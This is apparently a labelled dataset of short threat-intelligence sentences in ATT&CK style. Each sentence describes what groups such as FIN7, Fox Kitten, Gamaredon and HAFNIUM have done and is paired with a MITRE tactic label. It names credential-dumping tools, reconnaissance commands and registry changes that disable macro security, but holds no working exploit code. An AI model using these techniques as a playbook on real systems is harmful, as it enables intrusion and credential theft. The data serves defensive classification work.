"FIN7 has used the command `net group ""domain admins"" /domain` to enumerate domain groups.",['TA0007:Discovery']
FIN7 has registered look-alike domains for use in phishing campaigns.,['TA0042:Resource Development']
FIN7 has compromised a digital product website and modified multiple download links to point to trojanized versions of offered digital products.,['TA0042:Resource Development']
FIN7 spear phishing campaigns have included malicious Word documents with DDE execution.,['TA0002:Execution']
FIN7 has exfiltrated stolen data to the MEGA file sharing site.,['TA0010:Exfiltration']
FIN7 has compromised targeted organizations through exploitation of CVE-2021-31207 in Exchange.,['TA0001:Initial Access']
FIN7 has exploited ZeroLogon against vulnerable domain controllers.,['TA0008:Lateral Movement']
FIN7's Harpy backdoor malware can use DNS as a backup channel for C2 if HTTP fails.,['TA0011:Command and Control']
"FIN7 has downloaded additional malware to execute on the victim's machine, including by using a PowerShell script to launch shellcode that retrieves an additional payload.",['TA0011:Command and Control']
FIN7 used JavaScript scripts to help perform tasks on the victim's machine.,['TA0002:Execution']
"FIN7 has used Kerberoasting PowerShell commands such as, `Invoke-Kerberoast` for credential access and to enable lateral movement.",['TA0006:Credential Access']
FIN7 has used compromised credentials for access as SYSTEM on Exchange servers.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
FIN7 lured victims to double-click on images in the attachments they sent which would then execute the hidden LNK file.,['TA0002:Execution']
FIN7 has used malicious links to lure victims into downloading malware.,['TA0002:Execution']
"FIN7 has developed malware for use in operations, including the creation of infected removable media.",['TA0042:Resource Development']
FIN7 has created a scheduled task named “AdobeFlashSync” to establish persistence.,['TA0005:Defense Evasion']
FIN7 has attempted to run Darkside ransomware with the filename sleep.exe.,['TA0005:Defense Evasion']
FIN7 has used mshta.exe to execute VBScript to execute malicious code on victim systems.,['TA0005:Defense Evasion']
"FIN7 has used port-protocol mismatches on ports such as 53, 80, 443, and 8080 during C2.",['TA0011:Command and Control']
FIN7 used a PowerShell script to launch shellcode that retrieved an additional payload.,['TA0002:Execution']
"FIN7 malware has created Registry Run and RunOnce keys to establish persistence, and has also added items to the Startup folder.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
FIN7 has utilized the remote management tool Atera to download malware to a compromised system.,['TA0011:Command and Control']
FIN7 has used RDP to move laterally in victim environments.,['TA0008:Lateral Movement']
"FIN7 actors have mailed USB drives to potential victims containing malware that downloads and installs various backdoors, including in some cases for ransomware operations.","['TA0001:Initial Access', 'TA0008:Lateral Movement']"
FIN7 has used `rundll32.exe` to execute malware on a compromised network.,['TA0005:Defense Evasion']
FIN7 has used SSH to move laterally through victim environments.,['TA0008:Lateral Movement']
FIN7 malware has created scheduled tasks to establish persistence.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
FIN7 captured screenshots and desktop video recordings.,['TA0009:Collection']
FIN7 sent spearphishing emails with either malicious Microsoft Documents or RTF files attached.,['TA0001:Initial Access']
FIN7 has conducted broad phishing campaigns using malicious links.,['TA0001:Initial Access']
FIN7 has used the command `cmd.exe /C quser` to collect user session information.,['TA0007:Discovery']
"FIN7 has utilized a variety of tools such as Cobalt Strike, PowerSploit, and the remote management tool, Atera for targeting efforts.",['TA0042:Resource Development']
"FIN7 has staged legitimate software, that was trojanized to contain an Atera agent installer, on Amazon S3.",['TA0042:Resource Development']
FIN7 used images embedded into document lures that only activate the payload when a user double clicks to avoid sandboxes.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
FIN7 has used TightVNC to control compromised hosts.,['TA0008:Lateral Movement']
FIN7 has harvested valid administrative credentials for lateral movement.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
FIN7 created a custom video recording capability that could be used to monitor operations in the victim's environment.,['TA0009:Collection']
FIN7 used VBS scripts to help perform tasks on the victim's machine.,['TA0002:Execution']
FIN7 has set up Amazon S3 buckets to host trojanized digital products.,['TA0042:Resource Development']
FIN7 used the command prompt to launch commands on the victim’s machine.,['TA0002:Execution']
FIN7 has used WMI to install malware on targeted systems.,['TA0002:Execution']
FIN7 created new Windows services and added them to the startup directories for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
FIN8 has used RAR to compress collected data before exfiltration.,['TA0009:Collection']
FIN8 has used the Plink utility to tunnel RDP back to C2 infrastructure.,['TA0011:Command and Control']
FIN8 has injected malicious code into a new svchost.exe process.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
FIN8 has cleared logs during post compromise cleanup activities.,['TA0005:Defense Evasion']
"FIN8 has used an expired open-source X.509 certificate for testing in the OpenSSL repository, to connect to actor-controlled C2 servers.",['TA0042:Resource Development']
FIN8 has used environment variables and standard input to obfuscate command-line arguments. FIN8 also obfuscates malicious macros delivered as payloads.,['TA0005:Defense Evasion']
"FIN8 has deployed ransomware such as Ragnar Locker, White Rabbit, and attempted to execute Noberus on compromised networks.",['TA0040:Impact']
FIN8 has retrieved a list of trusted domains by using nltest.exe /domain_trusts.,['TA0007:Discovery']
FIN8 has used FTP to exfiltrate collected data.,['TA0010:Exfiltration']
FIN8 has exploited the CVE-2016-0167 local vulnerability.,['TA0004:Privilege Escalation']
FIN8 has deleted tmp and prefetch files during post compromise cleanup activities. FIN8 has also deleted PowerShell scripts to evade detection on compromised machines.,['TA0005:Defense Evasion']
FIN8 has used remote code execution to download subsequent payloads.,['TA0011:Command and Control']
FIN8 has used the Ping command to check connectivity to actor-controlled C2 servers.,['TA0007:Discovery']
FIN8 harvests credentials using Invoke-Mimikatz or Windows Credentials Editor .,['TA0006:Credential Access']
FIN8 has used malicious e-mail attachments to lure victims into executing malware.,['TA0002:Execution']
FIN8 has used emails with malicious links to lure victims into installing malware.,['TA0002:Execution']
FIN8 has deleted Registry keys during post compromise cleanup activities.,['TA0005:Defense Evasion']
FIN8's malicious spearphishing payloads are executed as PowerShell. FIN8 has also used PowerShell for lateral movement and credential access.,['TA0002:Execution']
FIN8 aggregates staged data from a network into a single location.,['TA0009:Collection']
FIN8 has used RDP for lateral movement.,['TA0008:Lateral Movement']
FIN8 has used dsquery and other Active Directory utilities to enumerate hosts; they have also used nltest.exe /dclist to retrieve a list of domain controllers.,['TA0007:Discovery']
FIN8 has attempted to map to C$ on enumerated hosts to test the scope of their current credentials/context. FIN8 has also used smbexec from the Impacket suite for lateral movement.,['TA0008:Lateral Movement']
FIN8 has used scheduled tasks to maintain RDP backdoors.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
FIN8 has used Registry keys to detect and avoid executing in potential sandboxes.,['TA0007:Discovery']
FIN8 has distributed targeted emails containing Word documents with embedded malicious macros.,['TA0001:Initial Access']
FIN8 has distributed targeted emails containing links to malicious documents with embedded macros.,['TA0001:Initial Access']
FIN8 has used PowerShell Scripts to check the architecture of a compromised machine before the selection of a 32-bit or 64-bit version of a malicious .NET loader.,['TA0007:Discovery']
FIN8 has executed the command `quser` to display the session details of a compromised machine.,['TA0007:Discovery']
FIN8 has used a malicious framework designed to impersonate the lsass.exe/vmtoolsd.exe token.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
FIN8 has used open-source tools such as Impacket for targeting efforts.,['TA0042:Resource Development']
FIN8 has used valid accounts for persistence and lateral movement.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
FIN8 has used HTTPS for command and control.,['TA0011:Command and Control']
"FIN8 has used sslip.io, a free IP to domain mapping service that also makes SSL certificate generation easier for traffic encryption, as part of their command and control.",['TA0011:Command and Control']
FIN8 has used a Batch file to automate frequently executed post compromise cleanup activities. FIN8 has also executed commands remotely via `cmd.exe`.,['TA0002:Execution']
"FIN8's malicious spearphishing payloads use WMI to launch malware and spawn `cmd.exe` execution. FIN8 has also used WMIC and the Impacket suite for lateral movement, as well as during and post compromise cleanup activities.",['TA0002:Execution']
FIN8 has used WMI event subscriptions for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Ferocious Kitten has acquired domains imitating legitimate sites.,['TA0042:Resource Development']
Ferocious Kitten has attempted to convince victims to enable malicious content within a spearphishing email by including an odd decoy message.,['TA0002:Execution']
Ferocious Kitten has named malicious files update.exe and loaded them into the compromise host's “Public” folder.,['TA0005:Defense Evasion']
"Ferocious Kitten has used right-to-left override to reverse executables’ names to make them appear to have different file extensions, rather than their real ones.",['TA0005:Defense Evasion']
Ferocious Kitten has conducted spearphishing campaigns containing malicious documents to lure victims to open the attachments.,['TA0001:Initial Access']
"Ferocious Kitten has obtained open source tools for its operations, including JsonCPP and Psiphon.",['TA0042:Resource Development']
Fox Kitten has used sticky keys to launch a command prompt.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Fox Kitten has used 7-Zip to archive data.,['TA0009:Collection']
Fox Kitten has used Google Chrome bookmarks to identify internal resources and assets.,['TA0007:Discovery']
Fox Kitten has brute forced RDP credentials.,['TA0006:Credential Access']
Fox Kitten has base64 encoded scripts to avoid detection.,['TA0005:Defense Evasion']
Fox Kitten has used a Perl reverse shell to communicate with C2.,['TA0002:Execution']
Fox Kitten has accessed files to gain valid credentials.,['TA0006:Credential Access']
Fox Kitten has obtained files from the victim's cloud storage instances.,['TA0009:Collection']
Fox Kitten has searched local system resources to access sensitive documents.,['TA0009:Collection']
Fox Kitten has searched network shares to access sensitive documents.,['TA0009:Collection']
Fox Kitten has used the Softerra LDAP browser to browse documentation on service accounts.,['TA0007:Discovery']
Fox Kitten has base64 encoded payloads to avoid detection.,['TA0005:Defense Evasion']
Fox Kitten has created KeyBase accounts to communicate with ransomware victims.,['TA0042:Resource Development']
"Fox Kitten has exploited known vulnerabilities in Fortinet, PulseSecure, and Palo Alto VPN appliances.",['TA0001:Initial Access']
Fox Kitten has exploited known vulnerabilities in remote services including RDP.,['TA0008:Lateral Movement']
Fox Kitten has used WizTree to obtain network files and directory listings.,['TA0007:Discovery']
Fox Kitten has downloaded additional tools including PsExec directly to endpoints.,['TA0011:Command and Control']
Fox Kitten has used prodump to dump credentials from LSASS.,['TA0006:Credential Access']
Fox Kitten has accessed ntuser.dat and UserClass.dat on compromised hosts.,['TA0007:Discovery']
Fox Kitten has created a local user account with administrator privileges.,['TA0003:Persistence']
Fox Kitten has named the task for a reverse proxy lpupdate to appear legitimate.,['TA0005:Defense Evasion']
Fox Kitten has named binaries and configuration files svhost and dllhost respectively to appear legitimate.,['TA0005:Defense Evasion']
Fox Kitten has accessed victim security and IT environments and Microsoft Teams to mine valuable information.,['TA0009:Collection']
Fox Kitten has used Volume Shadow Copy to access credential information from NTDS.,['TA0006:Credential Access']
Fox Kitten has used tools including NMAP to conduct broad scanning to identify open ports.,['TA0007:Discovery']
Fox Kitten has used scripts to access credential information from the KeePass database.,['TA0006:Credential Access']
Fox Kitten has used PowerShell scripts to access credential data.,['TA0002:Execution']
Fox Kitten has used protocol tunneling for communication and RDP activity on compromised hosts through the use of open source tools such as ngrok and custom tool SSHMinion.,['TA0011:Command and Control']
Fox Kitten has used the open source reverse proxy tools including FRPC and Go Proxy to establish connections from C2 to local servers.,['TA0011:Command and Control']
Fox Kitten has accessed Registry hives ntuser.dat and UserClass.dat.,['TA0007:Discovery']
Fox Kitten has used RDP to log in and move laterally in the target environment.,['TA0008:Lateral Movement']
Fox Kitten has used Angry IP Scanner to detect remote systems.,['TA0007:Discovery']
Fox Kitten has used valid accounts to access SMB shares.,['TA0008:Lateral Movement']
Fox Kitten has used the PuTTY and Plink tools for lateral movement.,['TA0008:Lateral Movement']
Fox Kitten has used Scheduled Tasks for persistence and to load and execute a reverse proxy binary.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Fox Kitten has used a Twitter account to communicate with ransomware victims.,['TA0042:Resource Development']
Fox Kitten has installed TightVNC server and client on compromised servers and endpoints for lateral movement.,['TA0008:Lateral Movement']
Fox Kitten has used valid credentials with various services during lateral movement.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Fox Kitten has used Amazon Web Services to host C2.,['TA0011:Command and Control']
Fox Kitten has installed web shells on compromised hosts to maintain access.,['TA0003:Persistence']
Fox Kitten has used cmd.exe likely as a password changing mechanism.,['TA0002:Execution']
GALLIUM used WinRAR to compress and encrypt stolen data prior to exfiltration.,['TA0009:Collection']
GALLIUM has used stolen certificates to sign its tools including those from Whizzimo LLC.,['TA0005:Defense Evasion']
GALLIUM used DLL side-loading to covertly load PoisonIvy into memory on the victim machine.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"GALLIUM collected data from the victim's local system, including password hashes from the SAM hive in the Registry.",['TA0009:Collection']
GALLIUM created high-privileged domain user accounts to maintain access to victim networks.,['TA0003:Persistence']
GALLIUM used Web shells and HTRAN for C2 and to exfiltrate data.,['TA0010:Exfiltration']
GALLIUM exploited a publicly-facing servers including Wildfly/JBoss servers to gain access to the network.,['TA0001:Initial Access']
GALLIUM used a modified version of HTRAN to redirect connections between networks.,['TA0011:Command and Control']
"GALLIUM has used VPN services, including SoftEther VPN, to access and maintain persistence in victim environments.","['TA0001:Initial Access', 'TA0003:Persistence']"
"GALLIUM ensured each payload had a unique hash, including by using different types of packers.",['TA0005:Defense Evasion']
"GALLIUM dropped additional tools to victims during their operation, including portqry.exe, a renamed cmd.exe file, winrar, and HTRAN.",['TA0011:Command and Control']
GALLIUM used a modified version of Mimikatz along with a PowerShell-based Mimikatz to dump credentials on the victim machines.,['TA0006:Credential Access']
GALLIUM has used PsExec to move laterally between hosts in the target network.,['TA0008:Lateral Movement']
GALLIUM compressed and staged files in multi-part archives in the Recycle Bin prior to exfiltration.,['TA0009:Collection']
GALLIUM used a modified version of HTRAN in which they obfuscated strings such as debug messages in an apparent attempt to evade detection.,['TA0005:Defense Evasion']
GALLIUM used dumped hashes to authenticate to other machines via pass the hash.,"['TA0005:Defense Evasion', 'TA0008:Lateral Movement']"
GALLIUM used PowerShell for execution to assist in lateral movement as well as for dumping credentials stored on compromised machines.,['TA0002:Execution']
GALLIUM used a modified version of NBTscan to identify available NetBIOS name servers over the network as well as ping to identify remote systems.,['TA0007:Discovery']
GALLIUM used a renamed cmd.exe file to evade detection.,['TA0005:Defense Evasion']
GALLIUM established persistence for PoisonIvy by created a scheduled task.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"GALLIUM used reg commands to dump specific hives from the Windows Registry, such as the SAM hive, and obtain password hashes.",['TA0006:Credential Access']
GALLIUM has used Taiwan-based servers that appear to be exclusive to GALLIUM.,['TA0042:Resource Development']
"GALLIUM packed some payloads using different types of packers, both known and custom.",['TA0005:Defense Evasion']
GALLIUM used ipconfig /all to obtain information about the victim network configuration. The group also ran a modified version of NBTscan to identify available NetBIOS name servers.,['TA0007:Discovery']
GALLIUM used netstat -oan to obtain information about the victim network connections.,['TA0007:Discovery']
GALLIUM used whoami and query user to obtain information about the victim user.,['TA0007:Discovery']
"GALLIUM has used a variety of widely-available tools, which in some cases they modified to add functionality and/or subvert antimalware solutions.",['TA0042:Resource Development']
GALLIUM leveraged valid accounts to maintain access to a victim network.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
GALLIUM used Web shells to persist in victim environments and assist in execution and exfiltration.,['TA0003:Persistence']
GALLIUM used the Windows command shell to execute commands.,['TA0002:Execution']
GALLIUM used WMI for execution to assist in lateral movement as well as for installing tools across multiple assets.,['TA0002:Execution']
GCMAN uses Putty for lateral movement.,['TA0008:Lateral Movement']
GCMAN uses VNC for lateral movement.,['TA0008:Lateral Movement']
GOLD SOUTHFIELD has executed base64 encoded PowerShell scripts on compromised hosts.,['TA0005:Defense Evasion']
GOLD SOUTHFIELD has distributed ransomware by backdooring software installers via a strategic web compromise of the site hosting Italian WinRAR.,['TA0001:Initial Access']
GOLD SOUTHFIELD has exploited Oracle WebLogic vulnerabilities for initial compromise.,['TA0001:Initial Access']
GOLD SOUTHFIELD has used publicly-accessible RDP and remote management and monitoring servers to gain access to victim machines.,"['TA0001:Initial Access', 'TA0003:Persistence']"
GOLD SOUTHFIELD has conducted malicious spam campaigns to gain access to victim's machines.,['TA0001:Initial Access']
GOLD SOUTHFIELD has staged and executed PowerShell scripts on compromised hosts.,['TA0002:Execution']
"GOLD SOUTHFIELD has used the cloud-based remote management and monitoring tool ""ConnectWise Control"" to deploy REvil.",['TA0011:Command and Control']
GOLD SOUTHFIELD has used the remote monitoring and management tool ConnectWise to obtain screen captures from victim's machines.,['TA0009:Collection']
GOLD SOUTHFIELD has breached Managed Service Providers to deliver malware to MSP customers.,['TA0001:Initial Access']
"Gallmaker has used WinZip, likely to archive data prior to exfiltration.",['TA0009:Collection']
Gallmaker attempted to exploit Microsoft’s DDE protocol in order to gain access to victim machines and for execution.,['TA0002:Execution']
Gallmaker sent victims a lure document with a warning that asked victims to “enable content” for execution.,['TA0002:Execution']
Gallmaker obfuscated shellcode used during execution.,['TA0005:Defense Evasion']
Gallmaker used PowerShell to download additional payloads and for execution.,['TA0002:Execution']
Gallmaker sent emails with malicious Microsoft Office documents attached.,['TA0001:Initial Access']
Gamaredon Group has deployed scripts on compromised systems that automatically scan for interesting documents.,['TA0009:Collection']
Gamaredon Group has used modules that automatically upload gathered documents to the C2 server.,['TA0010:Exfiltration']
Gamaredon Group has obfuscated .NET executables by inserting junk code.,['TA0005:Defense Evasion']
Gamaredon Group has used obfuscated or encrypted scripts.,['TA0005:Defense Evasion']
Gamaredon Group has compiled the source code for a downloader directly on the infected system using the built-in Microsoft.CSharp.CSharpCodeProvider class.,['TA0005:Defense Evasion']
Gamaredon Group malware can insert malicious macros into documents using a Microsoft.Office.Interop object.,['TA0002:Execution']
Gamaredon Group has used obfuscated VBScripts with randomly generated variable names and concatenated strings.,['TA0011:Command and Control']
Gamaredon Group has collected files from infected systems and uploaded them to a C2 server.,['TA0009:Collection']
Gamaredon Group malware has collected Microsoft Office documents from mapped network drives.,['TA0009:Collection']
"A Gamaredon Group file stealer has the capability to steal data from newly connected logical volumes on a system, including USB drives.",['TA0009:Collection']
"Gamaredon Group tools decrypted additional payloads from the C2. Gamaredon Group has also decoded base64-encoded source code of a downloader. Additionally, Gamaredon Group has decoded Telegram content to reveal the IP address for C2 communications.",['TA0005:Defense Evasion']
Gamaredon Group has delivered macros which can tamper with Microsoft Office security settings.,['TA0005:Defense Evasion']
Gamaredon Group has used tools to delete files and folders from victims' desktops and profiles.,['TA0040:Impact']
Gamaredon Group has registered multiple domains to facilitate payload staging and C2.,['TA0042:Resource Development']
Gamaredon Group has incorporated dynamic DNS domains in its infrastructure.,['TA0011:Command and Control']
Gamaredon Group has used geoblocking to limit downloads of the malicious file to specific geographic locations.,['TA0005:Defense Evasion']
A Gamaredon Group file stealer can transfer collected files to a hardcoded C2 server.,['TA0010:Exfiltration']
Gamaredon Group has used fast flux DNS to mask their command and control channel behind rotating IP addresses.,['TA0011:Command and Control']
Gamaredon Group tools can delete files used during an operation.,['TA0005:Defense Evasion']
Gamaredon Group macros can scan for Microsoft Word and Excel files to inject with additional malicious macros. Gamaredon Group has also used its backdoors to automatically list interesting files found on a system.,['TA0007:Discovery']
Gamaredon Group has used hidcon to run batch files in a hidden console window.,['TA0005:Defense Evasion']
"Gamaredon Group has downloaded additional malware and tools onto a compromised host. For example, Gamaredon Group uses a backdoor script to retrieve and decode additional payloads once in victim environments.",['TA0011:Command and Control']
Gamaredon Group has left taunting images and messages on the victims' desktops as proof of system access.,['TA0040:Impact']
Gamaredon Group has used an Outlook VBA module on infected systems to send phishing emails with malicious attachments to other employees within the organization.,['TA0008:Lateral Movement']
Gamaredon Group has tested connectivity between a compromised machine and a C2 server using Ping with commands such as `CSIDL_SYSTEM\cmd.exe /c ping -n 1`.,['TA0007:Discovery']
Gamaredon Group has attempted to get users to click on Office attachments with malicious macros embedded.,['TA0002:Execution']
Gamaredon Group has attempted to get users to click on a link pointing to a malicious HTML file leading to follow-on malicious content.,['TA0002:Execution']
Gamaredon Group has used legitimate process names to hide malware including svchosst.,['TA0005:Defense Evasion']
Gamaredon Group has removed security settings for VBA macro execution by changing registry values HKCU\Software\Microsoft\Office\<version>\<product>\Security\VBAWarnings and HKCU\Software\Microsoft\Office\<version>\<product>\Security\AccessVBOM.,['TA0005:Defense Evasion']
Gamaredon Group has used `mshta.exe` to execute malicious files.,['TA0005:Defense Evasion']
Gamaredon Group malware has used CreateProcess to launch additional malicious components.,['TA0002:Execution']
Gamaredon Group has delivered self-extracting 7z archive files within malicious document attachments.,['TA0005:Defense Evasion']
"Gamaredon Group has inserted malicious macros into existing documents, providing persistence when they are reopened. Gamaredon Group has loaded the group's previously delivered VBA project by relaunching Microsoft Outlook with the /altvba option, once the Application.Startup event is received.",['TA0003:Persistence']
Gamaredon Group has used Telegram Messenger content to discover the IP address for C2 communications.,['TA0011:Command and Control']
Gamaredon Group tools have contained an application to check performance of USB flash drives. Gamaredon Group has also used malware to scan for removable drives.,['TA0007:Discovery']
Gamaredon Group has used obfuscated PowerShell scripts for staging.,['TA0002:Execution']
Gamaredon Group has used tools to enumerate processes on target hosts including Process Explorer.,['TA0007:Discovery']
Gamaredon Group tools have registered Run keys in the registry to give malicious VBS files persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Gamaredon Group malware has used rundll32 to launch additional malicious components.,['TA0005:Defense Evasion']
Gamaredon Group has created scheduled tasks to launch executables after a designated number of minutes have passed.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Gamaredon Group's malware can take screenshots of the compromised computer every minute.,['TA0009:Collection']
Gamaredon Group has delivered spearphishing emails with malicious attachments to targets.,['TA0001:Initial Access']
A Gamaredon Group file stealer can gather the victim's computer name and drive serial numbers to send to a C2 server.,['TA0007:Discovery']
A Gamaredon Group file stealer can gather the victim's username to send to a C2 server.,['TA0007:Discovery']
Gamaredon Group has injected malicious macros into all Word and Excel documents on mapped network drives.,['TA0008:Lateral Movement']
Gamaredon Group has used DOCX files to download malicious DOT document templates and has used RTF template injection to download malicious payloads. Gamaredon Group can also inject malicious macros or remote templates into documents already present on compromised systems.,['TA0005:Defense Evasion']
"Gamaredon Group has used various legitimate tools, such as `mshta.exe` and Reg, and services during operations.",['TA0042:Resource Development']
Gamaredon Group has registered domains to stage payloads.,['TA0042:Resource Development']
"Gamaredon Group has used VNC tools, including UltraVNC, to remotely interact with compromised hosts.",['TA0008:Lateral Movement']
Gamaredon Group has used VPS hosting providers for infrastructure outside of Russia.,['TA0042:Resource Development']
"Gamaredon Group has embedded malicious macros in document templates, which executed VBScript. Gamaredon Group has also delivered Microsoft Outlook VBA projects with embedded macros.",['TA0002:Execution']
Gamaredon Group has used HTTP and HTTPS for C2 communications.,['TA0011:Command and Control']
Gamaredon Group has used GitHub repositories for downloaders which will be obtained by the group's .NET executable on the compromised system.,['TA0011:Command and Control']
Gamaredon Group has used various batch scripts to establish C2 and download additional files. Gamaredon Group's backdoor malware has also been written to a batch file.,['TA0002:Execution']
Gamaredon Group has used WMI to execute scripts used for discovery and for determining the C2 IP address.,['TA0002:Execution']
Gorgon Group malware can decode contents from a payload that was Base64 encoded and write the contents to a file.,['TA0005:Defense Evasion']
Gorgon Group malware can attempt to disable security features in Microsoft Office and Windows Defender using the taskkill command.,['TA0005:Defense Evasion']
Gorgon Group has used -W Hidden to conceal PowerShell windows by setting the WindowStyle parameter to hidden.,['TA0005:Defense Evasion']
Gorgon Group malware can download additional files from C2 servers.,['TA0011:Command and Control']
Gorgon Group attempted to get users to launch malicious Microsoft Office attachments delivered via spearphishing emails.,['TA0002:Execution']
Gorgon Group malware can deactivate security mechanisms in Microsoft Office by editing several keys and values under HKCU\Software\Microsoft\Office\.,['TA0005:Defense Evasion']
"Gorgon Group malware can leverage the Windows API call, CreateProcessA, for execution.",['TA0002:Execution']
"Gorgon Group malware can download a remote access tool, ShiftyBug, and inject into another process.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Gorgon Group malware can use PowerShell commands to download and execute a payload and open a decoy document on the victim’s machine.,['TA0002:Execution']
Gorgon Group malware can use process hollowing to inject one of its trojans into another process.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Gorgon Group malware can create a .lnk file and add a Registry Run key to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Gorgon Group malware can create a .lnk file and add a Registry Run key to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Gorgon Group sent emails to victims with malicious Microsoft Office documents attached.,['TA0001:Initial Access']
Gorgon Group has obtained and used tools such as QuasarRAT and Remcos.,['TA0042:Resource Development']
Gorgon Group has used macros in Spearphishing Attachments as well as executed VBScripts on victim machines.,['TA0002:Execution']
Gorgon Group malware can use cmd.exe to download and execute payloads and to execute commands on the system.,['TA0002:Execution']
"Group5 disguised its malicious binaries with several layers of obfuscation, including encrypting the files.",['TA0005:Defense Evasion']
Malware used by Group5 is capable of remotely deleting files from victims.,['TA0005:Defense Evasion']
Malware used by Group5 is capable of capturing keystrokes.,"['TA0009:Collection', 'TA0006:Credential Access']"
Malware used by Group5 is capable of watching the victim's screen.,['TA0009:Collection']
HAFNIUM has granted privileges to domain accounts.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
HAFNIUM has used 7-Zip and WinRAR to compress stolen files for exfiltration.,['TA0009:Collection']
HAFNIUM has interacted with Office 365 tenants to gather details regarding target's environments.,['TA0043:Reconnaissance']
HAFNIUM has collected data and files from a compromised machine.,['TA0009:Collection']
HAFNIUM has created domain accounts.,['TA0003:Persistence']
HAFNIUM has collected e-mail addresses for users they intended to target.,['TA0043:Reconnaissance']
"HAFNIUM has exfiltrated data to file sharing sites, including MEGA.",['TA0010:Exfiltration']
"HAFNIUM has exploited CVE-2021-44228 in Log4j and CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 to compromise on-premises versions of Microsoft Exchange Server.",['TA0001:Initial Access']
HAFNIUM has searched file contents on a compromised host.,['TA0007:Discovery']
HAFNIUM gathered the fully qualified domain names for targeted Exchange servers in the victim's environment.,['TA0043:Reconnaissance']
HAFNIUM has hidden files on a compromised host.,['TA0005:Defense Evasion']
HAFNIUM has obtained IP addresses for publicly-accessible Exchange servers.,['TA0043:Reconnaissance']
HAFNIUM has downloaded malware and tools--including Nishang and PowerCat--onto a compromised host.,['TA0011:Command and Control']
"HAFNIUM has checked for network connectivity from a compromised host using `ping`, including attempts to contact `google.com`.",['TA0007:Discovery']
HAFNIUM has used procdump to dump the LSASS process memory.,['TA0006:Credential Access']
HAFNIUM has used the NT AUTHORITY\SYSTEM account to create files on Exchange servers.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
HAFNIUM has stolen copies of the Active Directory database .,['TA0006:Credential Access']
HAFNIUM has used TCP for C2.,['TA0011:Command and Control']
HAFNIUM has used the Exchange Power Shell module Set-OabVirtualDirectoryPowerShell to export mailbox data.,['TA0002:Execution']
HAFNIUM has used `tasklist` to enumerate processes.,['TA0007:Discovery']
HAFNIUM has used web shells to export mailbox data.,['TA0009:Collection']
"HAFNIUM has enumerated domain controllers using `net group ""Domain computers""` and `nltest /dclist`.",['TA0007:Discovery']
HAFNIUM has used rundll32 to load malicious DLLs.,['TA0005:Defense Evasion']
HAFNIUM has used ASCII encoding for C2 traffic.,['TA0011:Command and Control']
HAFNIUM has collected IP information via IPInfo.,['TA0007:Discovery']
HAFNIUM has used `whoami` to gather user information.,['TA0007:Discovery']
HAFNIUM has operated from leased virtual private servers in the United States.,['TA0042:Resource Development']
"HAFNIUM has used open-source C2 frameworks, including Covenant.",['TA0011:Command and Control']
HAFNIUM has acquired web services for use in C2 and exfiltration.,['TA0042:Resource Development']
"HAFNIUM has deployed multiple web shells on compromised servers including SIMPLESEESHARP, SPORTSBALL, China Chopper, and ASPXSpy.",['TA0003:Persistence']
HAFNIUM has used `cmd.exe` to execute commands on the victim's machine.,['TA0002:Execution']
HEXANE has used a PowerShell-based keylogging tool to capture the window title.,['TA0007:Discovery']
"HEXANE has used cloud services, including OneDrive, for C2.",['TA0011:Command and Control']
HEXANE has used brute force attacks to compromise valid credentials.,['TA0006:Credential Access']
HEXANE has used Base64-encoded scripts.,['TA0005:Defense Evasion']
HEXANE has run `cmdkey` on victim machines to identify stored credentials.,['TA0006:Credential Access']
HEXANE has used a Mimikatz-based tool and a PowerShell script to steal passwords from Google Chrome.,['TA0006:Credential Access']
HEXANE has set up custom DNS servers to send commands to compromised hosts via TXT records.,['TA0042:Resource Development']
"HEXANE has registered and operated domains for campaigns, often using a security or web technology theme or impersonating the targeted organization.",['TA0042:Resource Development']
HEXANE has used compromised accounts to send spearphishing emails.,['TA0042:Resource Development']
HEXANE has established email accounts for use in domain registration including for ProtonMail addresses.,['TA0042:Resource Development']
"HEXANE has targeted executives, human resources staff, and IT personnel for spearphishing.",['TA0043:Reconnaissance']
"HEXANE has used cloud services, including OneDrive, for data exfiltration.",['TA0010:Exfiltration']
HEXANE has identified specific potential victims at targeted organizations.,['TA0043:Reconnaissance']
"HEXANE has identified executives, HR, and IT staff at victim organizations for further targeting.",['TA0043:Reconnaissance']
HEXANE has downloaded additional payloads and malicious scripts onto a compromised host.,['TA0011:Command and Control']
"HEXANE has conducted internal spearphishing attacks against executives, HR, and IT personnel to gain information and access.",['TA0008:Lateral Movement']
HEXANE has used tools including BITSAdmin to test internet connectivity from compromised hosts.,['TA0007:Discovery']
HEXANE has used a PowerShell-based keylogger named `kl.ps1`.,"['TA0009:Collection', 'TA0006:Credential Access']"
